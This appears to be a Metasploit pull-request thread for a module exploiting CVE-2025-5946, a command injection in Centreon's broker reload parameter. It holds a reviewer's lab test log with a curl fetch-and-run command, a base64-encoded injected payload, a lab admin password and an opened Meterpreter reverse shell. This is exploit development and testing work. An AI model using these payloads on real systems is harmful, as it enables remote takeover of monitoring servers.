Centreon authenticated command injection leading to RCE via broker engine "reload" parameter [CVE-2025-5946]

[h00die-gr3y]

Centreon is a platform designed to monitor your cloud and on-premises infrastructure.
This module exploits an command injection vulnerability using the broker engine reload setting on the poller configuration page of the Centreon web application. Injecting a malcious payload at the broker engine reload parameter and restarting the poller triggers this vulnerability.
You need have admin access at the Centreon Web application in order to execute this RCE.

This issue affects all Centreon editions >= 19.10.0 and it is fixed in Centreon Web versions 24.10.13, 24.04.18 and 23.10.28.

[jvoisin]

It'd be lovely this have this into a mixing, as there are already 3 modules targeting centreon.

[dledda-r7]

I'd agree here, i think we have a non-written rule that if 3 modules are doing something similar it should be a mixin.

[jvoisin]

This would also be great to have in a mixin <3

[dledda-r7]

Hello @h00die-gr3y,
Thanks for your module, I've left a review and I will setup the target to test the exploit.

[dledda-r7]

I'd agree here, i think we have a non-written rule that if 3 modules are doing something similar it should be a mixin.

[dledda-r7]

msf exploit(linux/http/centreon_auth_rce_cve_2025_5946) > run
[*] Command served: curl -so ./YXGJJaXKVqC http://192.168.136.136:8080/pvW_jshTHEZq9kXYRjnS7Q;chmod +x ./YXGJJaXKVqC;./YXGJJaXKVqC&
[*] Command to run on remote host: curl -s http://192.168.136.136:8080/Vhk3Bl7ijhfaGKIdPGCtzg|sh
[*] Fetch handler listening on 192.168.136.136:8080
[*] HTTP server started
[*] Adding resource /pvW_jshTHEZq9kXYRjnS7Q
[*] Adding resource /Vhk3Bl7ijhfaGKIdPGCtzg
[*] Started reverse TCP handler on 192.168.136.136:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Centreon version 23.04.5 ForceExploit is enabled, proceeding with exploitation.
[*] Trying to log in with admin credentials admin:Centreon!123 at the Centreon Web application.
[*] Succesfully authenticated at the Centreon Web application.
[*] Saving admin credentials at the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] payload=;echo${IFS}Y3VybCAtcyBodHRwOi8vMTkyLjE2OC4xMzYuMTM2OjgwODAvVmhrM0JsN2lqaGZhR0tJZFBHQ3R6Z3xzaA==|(base64${IFS}--decode||base64${IFS}-d)|sh
[*] centreon_token=d7b1c15bfbce42a5dcc82ba75d1c69f3
[+] Poller setting "broker_reload_command" updated with payload.
[*] Client 192.168.136.146 requested /Vhk3Bl7ijhfaGKIdPGCtzg
[*] Sending payload to 192.168.136.146 (curl/7.61.1)
[*] Client 192.168.136.146 requested /pvW_jshTHEZq9kXYRjnS7Q
[*] Sending payload to 192.168.136.146 (curl/7.61.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.136.146
[*] Meterpreter session 1 opened (192.168.136.136:4444 -> 192.168.136.146:36554) at 2025-11-04 08:48:30 -0500

[*] Cleaning up the mess...
[*] centreon_token=5adae970c66bef1f1b214512e93ba775
[+] Poller setting "broker_reload_command" updated with payload.
[+] Payload has been successfully removed from the poller setting "broker_reload_command".

meterpreter > 
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat 8.8 (Linux 4.18.0-477.13.1.el8_8.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: apache
meterpreter > 

My version in theory is not exploitable but this looks like a nice shell 🐚